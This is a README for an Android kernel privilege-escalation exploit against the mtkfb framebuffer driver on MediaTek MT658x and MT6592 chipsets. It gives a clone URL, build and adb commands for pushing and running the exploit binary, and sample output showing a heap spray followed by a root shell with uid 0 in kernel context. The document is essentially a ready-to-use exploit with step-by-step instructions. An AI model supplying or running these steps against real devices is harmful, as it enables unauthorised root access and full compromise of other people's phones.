MtkfbExploit@hakt0r


git clone https://hakt0r.de/MtkfbExploit/git

MtkfbExploit

mtkfb exploit for mt658x & mt6592

Build

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk

Usage

connect your phone via adb

adb push ./libs/armeabi/mtkfbExploit /data/local/tmp
adb shell
cd /data/local/tmp
./mtkfbExploit

if your device is vulnerable, you will see output like this:

dispif_info_addr=0xc0de9424
Spraying thread done!
Trying exp with display_id: 0x80445e61, magic_num: 0xcec1c000
1 round...
We need to get root here!
Root success!
shell@hwH30-T00:/data/local/tmp # id
uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:kernel:s0